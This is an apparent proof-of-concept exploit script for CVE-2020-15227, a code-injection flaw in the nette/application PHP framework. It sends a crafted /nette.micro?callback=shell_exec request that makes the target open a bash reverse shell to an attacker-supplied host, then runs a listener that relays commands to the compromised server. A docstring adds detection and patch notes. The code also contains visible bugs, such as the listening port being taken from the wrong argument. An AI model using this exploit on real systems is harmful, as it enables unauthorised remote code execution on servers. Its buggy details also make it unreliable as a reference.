#!/usr/bin/python
# author: @fr0z3nsp4z3
#
# Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6
# and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to a
# code injection attack by passing specially formed parameters to URL that may possibly lead to RCE.
#
# Reported by Cyku Hong from DEVCORE (https://devco.re)
#
# Impact
# Code injection, possible remote code execution.
#
# Patches
# Fixed in nette/application 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette 2.0.19 and 2.1.13
"""Proof-of-concept script for CVE-2020-15227 (nette/application, nette/nette).

Reviewer notes (defensive context):

- The only HTTP traffic this script produces is a single GET to
  ``<url>:<port>/nette.micro?callback=...&cmd=...``.  A request to
  ``/nette.micro`` carrying a ``callback`` query parameter is therefore the
  observable artifact to look for in web-server, proxy or WAF logs when
  assessing whether an instance was probed for this issue.
- The remediation is the package upgrade listed under "Patches" above; this
  page describes no configuration-only mitigation.
- Each positional argument is declared with ``nargs='+'`` (a list), but only
  the first element (``[0]``) of each is used; extra values are ignored.
- The script is a flat sequence of statements with network side effects
  (bind/listen/accept, urlopen) and no functions; it is not importable as a
  library and has no return value to test.
"""
import sys
import socket
from urllib import request
import argparse
import pyfiglet  # third-party; used only for the banner below

# Banner output only; no functional effect.
print(pyfiglet.figlet_format('EXPLOITED BY'))
print(pyfiglet.figlet_format('FR0Z3NSP4Z3'))

# Command line: four positional arguments, each parsed into a list (nargs='+').
parser = argparse.ArgumentParser(description='CVE-2020-15227 exploit by fr0z3nsp4z3')
parser.add_argument('url', metavar='url', nargs='+', help='Victim web URL formated as http|s://domain.com')
parser.add_argument('port', metavar='port', nargs='+', help='Victim web service port')
parser.add_argument('lhost', metavar='lhost', nargs='+', help='Attacker box IP|domain')
parser.add_argument('lport', metavar='lport', nargs='+', help='Attacker box port')
# NOTE: the parsed Namespace is stored back into sys.argv, replacing the
# original argument list for the remainder of the process.
sys.argv = parser.parse_args()
url = sys.argv.url[0]
port = sys.argv.port[0]
lhost = sys.argv.lhost[0]
lport = sys.argv.port[0]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # start a socket object 's'
s.bind((lhost, lport))  # define the kali IP and the listening port
s.listen(1)  # define the backlog size, since we are expecting a single connection from a single
             # target we will listen to one connection
# The message text is fixed and does not reflect the lport argument.
print('[+] Listening for incoming TCP connection on port 9999')
# accept() blocks until a peer connects.
conn, addr = s.accept()
# Single GET request; the whole URL is built by plain string concatenation of
# the url/port/lhost/lport arguments (no quoting or validation applied).
r = request.urlopen(url+':'+port+'/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1')
print('[+] We got a connection from: ', addr)
while True:
    command = input()  # Get user input and store it in command variable
    # Substring match: any input containing 'exit' ends the session.
    if 'exit' in command:  # If we got terminate command, inform the client and close the connect and
                           # break the loop
        conn.close()
        break
    else:
        conn.send(bytes(command))  # Otherwise we will send the command to the target
        print(conn.recv(1024))  # and print the result that we got back (at most 1024 bytes per read)